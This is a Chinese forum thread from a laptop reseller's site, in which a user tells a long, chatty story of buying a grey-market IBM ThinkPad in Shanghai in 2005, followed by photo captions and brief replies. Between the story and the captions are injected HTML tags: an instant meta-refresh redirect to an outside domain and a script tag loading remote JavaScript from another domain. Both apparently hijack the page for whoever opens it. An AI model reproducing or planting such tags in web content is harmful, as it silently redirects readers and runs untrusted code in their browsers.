开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 迟到两年的购机手记(长篇,耐性不好者勿入)

迟到两年的购机手记

这两天闲来无事,在网上瞎逛,就顺便进了好久没来的翔意数码,看到了这么多图文并茂的购机手记,突然感到一种冲动,很想也把自己的购机、使用经历一吐为快,于是就整了下面一点东西。自从高中毕业以来,从来没写过这么长的文字,不通之处,敬请原谅啊。

先说说我买小黑之前的心路历程吧。本人04年毕业,工作找在山东,本来是挺好的。可由于人品问题,工种没分好,常年派驻在外。结果第一年,公司就把我派到河南去待一年。那个地方条件恶劣就不说了,更让我受不了的是没有电脑用,不能上网。唉,这对一个大学刚刚毕业的准网虫来说是多大一种折磨啊!并且由于工作需要,我要在外面漂泊很多年,住所不固定,买台式机不便携带,因此萌生了买笔记本的想法。可在当时,笔记本真TM的贵啊,就没有低于一万的,买不起啊。没办法,只好一边攒钱,一边关注行情。

一开始我想买戴尔的,它当时在《电脑报》做的广告很多(PS:貌似现在还是),说什么配置好、便宜之类的,总之被打动了。可后来有达人告诉我戴尔有很多问题,又想想它的直销,不大放心,就放弃了。后来看《微型计算机》,又看中一款华硕的,好像是叫V3,配置很好,可惜标价太贵了,16xxx元,远远超过我的预算,只能看看广告,流流口水了。

就在我挑花眼的时候,有天和一朋友聊,说起要买笔记本的事,他立刻推荐IBM,这之前我是想都不敢想,毕竟那2xxxx元的价格摆在那。那人就解释说是X货,很便宜,质量也有保证,他就买了一台,还给我推荐了一个网站。我第一次知道还有x货这种事,这不是天上掉馅饼嘛。不过对质量还是有所顾虑,反正当时也没攒够钱,就先慢慢地看着,看看网友对X货的评论,也慢慢地了解了一些x货的知识,同时慢慢地坚定了买x货IBM的信心。

到了05年8月份,在河南流放期满结束,我决定就买IBM的NH2了,迅驰二代,1.86g的cpu,512M的DDRII533内存,64M的X300独显,60g硬盘,14寸高分屏,这一配置在当时也算是比较高端了,钱也攒够了,剩下的就是在哪买的问题了。由于我这一年又要派驻到上海,就想在那买了,方便,并且我那个朋友推荐的商家总部也在上海,我当时也在他们的论坛泡了不少时间,感觉还是挺满意的,就决定在那一家买了。在去上海之前,公司先把我派回山东总部待了一段时间,我就在那把钱取出来了。毕竟要是在上海取的话,外地卡要多付100块手续费,舍不得啊。

就这样随身带着一万多块现金从山东跑到上海,平生没见过这么多现金,一路上感觉旁人看我的目光都不对,像是要抢劫我似的,真是提心吊胆啊:)。说来也巧,就在我决定出手的前一天,我接到一个大学同学的电话,说他和他三个同事要来上海买笔记本,并且也是x货。我一听那个激动啊,真是找到同道中人,他们也联系好卖家了,就是翔意(写到这主角才出来,真是不好意思啊)。我一想,我还是先别急着买,跟着他们去看看,见识见识,涨涨经验啊。

第二天他们到了,再具体谈了谈,原来他们对翔意相当了解。他们第一年是在北京实习的,当时就知道翔意的鼎鼎大名了,只是那时没钱,现在攒够了,人却离开北京了,不过幸好翔意在上海有个点,可以拿到货,他们就过来了。只不过取货点在浦东,离我们住的地方比较远,不过为了小黑,豁出去了。于是,坐公交,转地铁,一号线转二号线,再转公交,路上还遇到堵车,真是颇多波折啊。好不容易到了,我们像地下党接头一样,一堆人围在一个黑黑的小屋子里,看着代理人搬出四个箱子,心里那个激动啊。特别是我,即将要零距离接触心仪已久的小黑,虽然不是我的,但还是兴奋!咦,怎么掏出来二黑二白?原来,有两个人订的是惠普。买电脑的这四个家伙都是老手,一个个开始装系统,装完系统拿出软件测试,我在旁边顺便偷学了两招。

这时,一个意外出现了,一台惠普出现了一个坏点,但之前他们说好保点的。这种事情代理人不能做主,于是就打电话到北京,找老板,我也不知道当时谁接的电话,听到这件事后,很干脆,当即提出两个方案:要不那台惠普降一百,要不重新换一台。他们一想,这么多钱都花了,还是买个放心吧,就选择换一台。我在一旁看了,心想:这家信誉真不错啊!后来,翔意果然重新发了一台过来了,完美无缺,没有瑕疵,现在这家伙还用得好好的。

回去的路上,我心里就犹豫了,是翔意呢还是上海那家。其实那家根据我在论坛上长期观察,信誉也貌似不错。回去之后,我立马上两家论坛一比较,差距出来了:同款机型翔意要便宜200元左右。机子一样,信誉度这边有了亲身体会,价格还便宜,当即决定,就是翔意了。然后打电话给翔意,说要买机器。期间,我还无耻地利用了同学的名义,说我是买第二台,享受到了贵宾的待遇,便宜一百,还不要交订金,当时真是觉得爽啊(呵呵,鄙视我吧)!不过我后来又介绍了一个同事在翔意这儿买了一台T60,也算将功赎罪吧。

2005年8月20日,星期六,晴空万里,我想我大概很难忘记这一天,因为这一天是我把小黑正式娶回家的日子。那天中午,我背着一个书包,里面放着一百多张崭新的老人头,这可是我辛苦工作一年的全部家当。先打车去五号线,然后转一号线,再转二号线,再趁公交,终于顺利抵达目的地,一路上真是忐忑不安啊,紧紧地抱着包,就怕不小心丟了,那就完了。记得当时好像还有两个人也在买机器,他们都把小黑拆了,检查硬件。到了之后,由于之前来过一趟,代理人都认识我了,也不多说,直接就把我带到里面的屋子,把箱子拿出来了。他说要帮我拆箱,我赶紧制止了--小黑的第一次,还是让我亲自动手吧。慢慢拆开箱子,小黑终于露出了它的庐山真面目,由于之前近距离接触过他,反而不激动了,心情平静了下来。开机,检查了一下屏幕,没有坏点。然后又用软件看了一下硬件配置,没有问题,我也不想拆开看什么序列号,充分相信翔意的信誉,肯定不会骗人。最后就是付款,交钱的时候真是心疼啊。不过,小黑到手,更多的是开心。

回去的时候,心情就不一样了,虽然还是一样的路,并且抱着一个箱子,但一点也没觉得沉,感觉一会就到了,真是春风得意马蹄疾啊。回去之后,就是慢慢地欣赏小黑,不愧是IBM,做工就是一流。不过稍微有点缺陷的就是翔意给的赠品比较垃圾,OEM的小黑鼠没用几天就坏了,给的电脑锁质量也差,很快就被我扔了。不过翔意的售后服务还不错,我要的港票很快就寄过来了,后来他们复印的什么中文说明书,也给我寄了一份。

现在,这台T43已经陪我快两年了,这期间走南闯北,真是立下了汗马功劳,并且一点毛病没出,真是服了IBM的品质了。这期间,我同事的好几台华硕都出过问题,使我暗自庆幸当初没买华硕。不过我用小黑也比较爱惜,基本上没出什么大状况。就只有两次险情,一次我一不小心把一杯水洒在桌上,水从小黑左边排风口漫进去了,当时把我吓得够呛,赶紧关机,拔电池,然后等了一天,再开机,一点问题没有。还有一次,我坐车回家,红点包就放在旁边座上,突然那个破中巴一个急转弯,我猝防不及,人就被甩出去了,头重重地撞在车门上,与此同时,小黑也被甩了出去。我爬起来,顾不得去揉我的头,先把电脑包捡起来,心想坏了,这下小黑估计废了。一路上心急如焚,到家的第一件事就是拿出小黑,摁了一下电源,真是牛了,正常开机,硬盘也没事。我想,不知道是红点包质量好还是小黑本身素质过硬,这么强烈的撞击都没事,我的头可是还肿了一个大瘤,好长时间才消掉。

现在我就说说我用小黑的心得体会吧,可能也不一定全对,大家就多多原谅吧。首先,我觉得IBM的一键恢复做得不太好,占那么大空间,恢复还慢,所以我就把隐藏分区格了,自己给系统做个ghost,占地小,恢复还快。另外,翔意预装的系统我也没要,我更喜欢以自己的用户名装的系统,于是就自己装了一个,IBM的特色软件只要装一个Software Installer就行了,它会给你自动下载适合你系统的驱动,并且都是最新的版本,翔意安装盘里的比较老。

呼,终于写完了。我自己都吓了一跳,居然能写这么多,对于我这个懒人来说真是奇迹啊。当然,大部分都是废话,大家也别怪我浪费你们宝贵的时间就行啊。下面上图,是用我的N70拍的,又是晚上,不大清楚,大致看看就行了。

+600---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 600

顶盖上IBM的logo
翻开后的样子
再来一张
键盘左下角的标签,我可是正版XP(可惜是英文的,从来没用过)
键盘右下角,又是IBM的logo,最新的T61已经没有这个了,还有一个指纹识别器
为了保护键盘,特意买了一个键盘膜,这么薄的一点东西,花了80大元,真是黑啊
盖上膜的时候的样子!
再来一张,这次灯光比较好
膜拿掉后的键盘,是不是崭新的
再来一张清晰一点的。
小黑的音效比较差,只好给他配个小白:迷你音箱。不错吧
为了使蓝牙发挥作用,同时节省一个USB接口,我买了一个罗技蓝牙鼠标V270,很酷吧
来,翻个身,让大家看看你的肚皮。
最后,看看我的硬件配置,我加了根512M的内存
总算发完了,真是累啊
写了这么多,顶一个。工作用笔记本只用thinkpad的,单位是thinkpad的大客户。thinkpad被lenovo收购后,采购部门(在美国)立即转向dell,一个月不到转向hp,再后还是回到了thinkpad(质量不是一个层次)。IT部门的人被dell,hp搞得晕头转向。这是偶的轻身经历。
呵呵,写的真够详细的啊...不错
很详细的,经历也很精彩!
好帖子,顶啊
谢谢楼主,很喜欢T43,经典中的经典!尤其是触控板下面的左右键!
这就算长篇啊,怎么没加分呢.很详细的,经历精彩
写的不错啊,我这耐性不好的都一口气看完,呵呵。
写的不错   太迟了!!!!
纯的IBM机型呀!就是键盘膜不太好